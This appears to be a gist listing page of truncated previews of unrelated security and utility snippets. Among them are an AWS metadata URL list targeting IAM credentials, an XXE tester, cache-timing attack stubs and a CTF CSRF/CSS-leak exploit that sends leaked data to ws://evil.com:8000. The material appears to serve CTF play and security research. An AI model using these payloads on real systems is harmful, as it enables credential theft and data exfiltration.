Solves: 1
This write-up was made per request of other players who were playing ASIS CTF.
Note: I solved this challenge before the hint was released. \o/
from scryptos import * | |
d = open("out.csv").read().split("\n") | |
bits = "" | |
for x in d: | |
r = x.split(", ") | |
if len(r) > 4: | |
if int(r[3]) == 0: | |
if r[2] == "Note_on_c": |
<?php | |
// Extended tester from ezimuel (https://gist.github.com/ezimuel/9135151) | |
// The libxml entity loader is disabled by default | |
// even setting the libxml_disable_entity_loader to false doesn't works! | |
// | |
// @see http://uk3.php.net/manual/en/function.libxml-disable-entity-loader.php | |
// @see http://stackoverflow.com/a/10213239 | |
// @see https://stackoverflow.com/questions/24117700 | |
$dir = __DIR__; |
## AWS | |
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
http://169.254.169.254/latest/user-data | |
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/ami-id | |
http://169.254.169.254/latest/meta-data/reservation-id | |
http://169.254.169.254/latest/meta-data/hostname | |
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
global _time_load | |
global _cache_flush | |
global _run_attempt | |
extern _bools | |
extern _values | |
extern _pointers | |
section .text |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <stdint.h> | |
#ifdef _MSC_VER | |
#include <intrin.h> /* for rdtscp and clflush */ | |
#pragma optimize("gt",on) | |
#else | |
#include <x86intrin.h> /* for rdtscp and clflush */ | |
#endif |
<body> | |
<form action="http://css.teaser.insomnihack.ch/?page=profile" method="POST"> | |
// change admin's email | |
<input type="text" name="email" value="[email protected]"> | |
<input type="text" name="csrf" value=""> | |
<input type="text" name="change" value="Modify profile"> | |
</form> | |
<iframe id="leakchar"></iframe> | |
<script> | |
const WS = "ws://evil.com:8000"; |
import requests | |
import sys | |
import json | |
def waybackurls(host, with_subs): | |
if with_subs: | |
url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host | |
else: | |
url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host |
;; Simple TCP echo server in x86_64 assembly, using Linux syscalls | |
;; | |
;; nasm -felf64 -o server.o server.asm | |
;; ld server.o -o server | |
;; ./server | |
;; | |
global _start | |
;; Data definitions |
#!/bin/env python | |
import math | |
import sys | |
''' | |
This is a script which counts a character entropy in a single string. | |
Usage: entropy.py STRING |